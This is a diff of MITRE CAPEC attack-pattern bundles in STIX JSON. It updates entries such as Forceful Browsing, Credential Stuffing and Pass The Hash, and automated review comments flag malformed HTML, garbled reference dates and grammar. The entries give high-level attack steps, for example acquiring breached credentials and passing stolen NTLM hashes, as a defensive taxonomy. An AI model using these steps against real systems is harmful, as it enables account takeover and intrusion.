Version 3.3
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--839148e6-8714-4c06-abac-ee55fa335bf2",
|
||||
"id": "bundle--1341a9cf-5d7d-4df5-a055-8e14698c8d06",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Forceful Browsing",
|
||||
"description": "An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.",
|
||||
"external_references": [
|
||||
@@ -50,8 +50,9 @@
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:p>A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.</xhtml:p>\n <xhtml:p>An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role.</xhtml:p>\n "
|
||||
"\n <xhtml:p>A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.</xhtml:p>\n <xhtml:p>An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Spider: </b>Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt well-known or guessable resource locations: </b>Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record attempts on well-known URLs.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Use unauthorized resources: </b>By visiting the unprotected resource, the attacker makes use of unauthorized functionality.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Access unprotected functions and execute them.</td></tr></tbody></table><li> <p> <b>View unauthorized data: </b>The attacker discovers and views unprotected sensitive data.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The forcibly browseable pages or accessible resources must be discoverable and improperly protected."
|
||||
@@ -64,7 +65,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
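Review bot: The added `x_capec_execution_flow` value in the `@@ -50,8 +50,9 @@` hunk is an HTML fragment serialized into a JSON string, and that fragment is not well-formed: each techniques `<table>` is emitted as a direct child of `<ol>` after its `</li>`, so HTML parsers will hoist the tables out of the list and consumers rendering this field get a different structure from the one the exporter apparently intends. If the HTML form is kept, moving `</li>` to after the table repairs the nesting; a representation consumers can read without an HTML parser would be an array of step objects (constructed shape: `{"phase": "Explore", "step": "Spider", "techniques": ["..."]}`). The same string shape is used for the other execution-flow fields added on this page. Separately, the reworded example instance uses `themself`; `themselves` is the standard form.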
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--b6853d6e-dc33-454c-af80-1e7a298eb45a",
|
||||
"id": "bundle--207c3285-9ebf-477d-9c2d-76ee9ed67a6a",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Meta",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--92d428da-86d8-4437-a371-22de560b1564",
|
||||
"id": "bundle--0a4e5b52-a27b-48c8-bccd-6bad3a3a56bc",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -28,7 +28,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--2be836ed-2e59-4b1a-a2d2-b9ca5af935f1",
|
||||
"id": "bundle--48ee9e14-9c55-43b2-85c2-0abab71a9e3f",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -64,7 +64,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--cdd8ebb5-99ef-4afa-9723-0e7ed7717e9d",
|
||||
"id": "bundle--df56e6c7-0230-48e4-a3f5-17edc7ce1556",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Malicious Software Download",
|
||||
"description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,18 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/494.html",
|
||||
"external_id": "CWE-494"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Browser Extensions",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1176",
|
||||
"external_id": "T1176"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "User Execution:Malicious File",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1204/002",
|
||||
"external_id": "T1204.002"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -29,7 +41,7 @@
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--5f1d14b4-ecf8-4e81-a7ef-105df8a76cc8",
|
||||
"id": "bundle--a7b1dc1c-f58d-438f-8787-5758c3154628",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -40,7 +40,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--57136cd7-39b7-4994-954e-e6488249da84",
|
||||
"id": "bundle--6bd343c9-5a8d-40e3-85de-c540ef791af7",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -35,7 +35,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--0017d01a-bb05-417b-b73c-ef7cdf6a887c",
|
||||
"id": "bundle--adba44c6-a72f-4f28-b422-2bf0c7785edf",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -47,7 +47,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--97da0eb8-515f-4ada-8d49-2d86dd5bbff5",
|
||||
"id": "bundle--2c5c4260-30e1-4cfd-bda4-c46016c1adc9",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2017-08-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Resource Leak Exposure",
|
||||
"description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.",
|
||||
"external_references": [
|
||||
@@ -21,6 +21,12 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/404.html",
|
||||
"external_id": "CWE-404"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Endpoint Denial of Service:Application or System Exploitation",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1499/004",
|
||||
"external_id": "T1499.004"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -42,7 +48,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--96679e2e-c383-4ad7-b3c9-3cdccfd17e4c",
|
||||
"id": "bundle--91c67660-5b89-459e-971b-a3fac64e34c9",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Malicious Software Implanted",
|
||||
"description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.",
|
||||
"external_references": [
|
||||
@@ -40,7 +40,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--645b079a-4c1a-4f03-a7d9-14872910271b",
|
||||
"id": "bundle--09ca413c-7c3b-4ad0-b37a-9bf38b5b896a",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Meta",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,127 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--56d32fd3-8189-4b2c-ac67-4b1be3fd30ae",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
"type": "attack-pattern",
|
||||
"id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2020-07-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Credential Stuffing",
|
||||
"description": "\n <xhtml:p>An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services. Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform. If the password obtained by the adversary is used for multiple systems, accounts, and/or services, this attack will be successful (in the absence of other mitigations).</xhtml:p>\n <xhtml:p>Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.</xhtml:p>\n <xhtml:p>Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. 
Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.</xhtml:p>\n ",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
"url": "https://capec.mitre.org/data/definitions/600.html",
|
||||
"external_id": "CAPEC-600"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/307.html",
|
||||
"external_id": "CWE-307"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/309.html",
|
||||
"external_id": "CWE-309"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/262.html",
|
||||
"external_id": "CWE-262"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/263.html",
|
||||
"external_id": "CWE-263"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/654.html",
|
||||
"external_id": "CWE-654"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Brute Force:Credential Stuffing",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1110/004",
|
||||
"external_id": "T1110.004"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)",
|
||||
"url": "https://www.us-cert.gov/ncas/alerts/TA18-086A",
|
||||
"external_id": "REF-567"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Credential stuffing, Open Web Application Security Project (OWASP)",
|
||||
"url": "https://owasp.org/www-community/attacks/Credential_stuffing",
|
||||
"external_id": "REF-568"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times",
|
||||
"url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/",
|
||||
"external_id": "REF-569"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
|
||||
],
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_consequences": {
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authorization": [
|
||||
"Read Data"
|
||||
],
|
||||
"Confidentiality": [
|
||||
"Gain Privileges",
|
||||
"Read Data"
|
||||
],
|
||||
"Integrity": [
|
||||
"Modify Data"
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.",
|
||||
"In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known credentials: </b>The adversary must obtain known credentials in order to access the target system, application, or service.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.</td></tr><tr><td>An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.</td></tr><tr><td>An adversary conducts a sniffing attack to steal credentials as they are transmitted.</td></tr><tr><td>An adversary gains access to a database and exfiltrates password hashes.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.</td></tr></tbody></table><li> <p> <b>Determine target's password policy: </b>Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine minimum and maximum allowed password lengths.</td></tr><tr><td>Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).</td></tr><tr><td>Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt authentication: </b>Try each username/password combination until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each username/password combination through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful 
experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within the system or application.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.",
|
||||
"The system/application does not have a sound password policy that is being enforced.",
|
||||
"The system/application does not implement an effective password throttling mechanism.",
|
||||
"The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"A machine with sufficient resources for the job (e.g. CPU, RAM, HD).",
|
||||
"A known list of username/password combinations.",
|
||||
"A custom script that leverages the credential list to launch the attack."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"Low": "A Credential Stuffing attack is very straightforward."
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
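Review bot: The new file is not valid JSON if the line break inside the `description` string (between `Credential Stuffing attacks.` and `Password Spraying attacks`) and the one inside `x_capec_execution_flow` (after `successful`) are really in the file rather than a rendering wrap, since RFC 8259 requires control characters in strings to be escaped; they should be `\n` or removed, as the other paragraph breaks in the same field already are. The `reference_from_CAPEC` descriptions carry garbled dates: `2018--03---27` and `2014--10---02` should read `2018-03-27` and `2014-10-02`, and the same pattern appears in the Pass The Hash section below (`2020--04---01`, `2019--06---25`, `2010--02---23`), which points at the exporter or its input rather than at hand edits. These bundles look generated, so the fix belongs upstream of the export or it will be undone on the next run. Minor: in the first example instance, `and transfer money` should be `and transfers money`.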
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a052755b-06b1-4d81-b7da-1ca6d5cd737c",
|
||||
"id": "bundle--6e7f03a0-e94c-43fa-98dc-c6a2a6b8fe38",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Use of Captured Hashes (Pass The Hash)",
|
||||
"description": "An adversary uses stolen hash values for a user's credentials (username and password) to access systems managed under the same credential framwork that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, the hashed credentials' associated plaintext credentials are not requried for successful authentication. Therefore, if an adversary can obtain the hashed credentials of a user, he can then pass these hash values to the server or service to authenticate without needing to brute-force the hashes to obtain their cleartext values. The adversary can then impersonate the user and laterally move within the network. This technique can be performed against any operating system which leverages the LM or NTLM protocols.",
|
||||
"description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential (e.g. userID and password) hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -21,6 +21,62 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/836.html",
|
||||
"external_id": "CWE-836"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/294.html",
|
||||
"external_id": "CWE-294"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Use Alternate Authentication Material:Pass The Hash",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1550/002",
|
||||
"external_id": "T1550.002"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Dan Goodin, Attackers can use Zoom to steal users\u2019 Windows credentials with no warning, 2020--04---01, Ars Technica",
|
||||
"url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/",
|
||||
"external_id": "REF-575"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason",
|
||||
"url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
|
||||
"external_id": "REF-580"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation",
|
||||
"url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN",
|
||||
"external_id": "REF-581"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "How Pass-the-Hash works, Microsoft Corporation",
|
||||
"url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN",
|
||||
"external_id": "REF-582"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute",
|
||||
"url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283",
|
||||
"external_id": "REF-583"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -28,22 +84,43 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_consequences": {
|
||||
"Integrity": [
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authorization": [
|
||||
"Read Data"
|
||||
],
|
||||
"Confidentiality": [
|
||||
"Gain Privileges",
|
||||
"Read Data"
|
||||
],
|
||||
"Integrity": [
|
||||
"Modify Data"
|
||||
]
|
||||
},
|
||||
"x_capec_likelihood_of_attack": "Low",
|
||||
"x_capec_example_instances": [
|
||||
"Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]",
|
||||
"Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]"
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known Windows credential hash value pairs: </b>The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached Windows credential hash value pairs from the dark web.</td></tr><tr><td>An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.</td></tr><tr><td>An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt domain authentication: </b>Try each Windows credential hash value pair until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each Windows credential hash value pair through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within domain systems or applications.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Medium",
|
||||
"x_capec_prerequisites": [
|
||||
"The adversary needs to first obtain the hashed credentials of a user, via the use of a tool, prior to executing this attack.",
|
||||
